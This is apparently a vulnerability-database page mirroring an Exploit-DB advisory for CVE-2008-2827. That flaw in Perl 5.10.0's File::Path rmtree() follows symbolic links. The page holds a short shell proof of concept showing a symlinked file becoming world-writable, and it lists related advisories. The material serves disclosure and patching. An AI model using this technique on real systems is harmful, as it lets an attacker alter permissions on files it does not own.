Lucene search
+L

Perl - 'rmtree()' Function Local Insecure Permissions

🗓️ 23 Jun 2008 00:00:00Reported by Frans PopType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Perl 'rmtree()' Function Local Insecure Permission

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2008-2827
23 Jun 200819:41
attackerkb
Circl
CVE-2008-2827
23 Jun 200800:00
circl
CVE
CVE-2008-2827
23 Jun 200819:00
cve
Cvelist
CVE-2008-2827
23 Jun 200819:00
cvelist
Debian CVE
CVE-2008-2827
23 Jun 200819:00
debiancve
EUVD
EUVD-2008-2820
7 Oct 202500:30
euvd
Fedora
[SECURITY] Fedora 10 Update: perl-5.10.0-73.fc10
16 Jul 200907:33
fedora
Fedora
[SECURITY] Fedora 9 Update: perl-5.10.0-27.fc9
26 Jul 200805:55
fedora
Fedora
[SECURITY] Fedora 9 Update: perl-5.10.0-27.fc9
26 Jun 200808:33
fedora
Tenable Nessus
Fedora 9 : perl-5.10.0-27.fc9 (2008-5739)
2 Jul 200800:00
nessus
Rows per page
source: https://www.securityfocus.com/bid/29902/info

Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links.

Attackers can leverage this issue to change the permissions of arbitrary files.

Perl 5.10.0 is vulnerable; other versions may also be affected.

% touch foo
% ln -s foo bar
% ls -l foo bar
lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo
-rw-r--r-- 1 example example 0 2008-06-21 09:06 foo
% perl -e 'use File::Path rmtree; rmtree bar'
% ls -l foo bar
ls: cannot access bar: No such file or directory
-rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Feb 2014 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 24.6
EPSS0.0085
23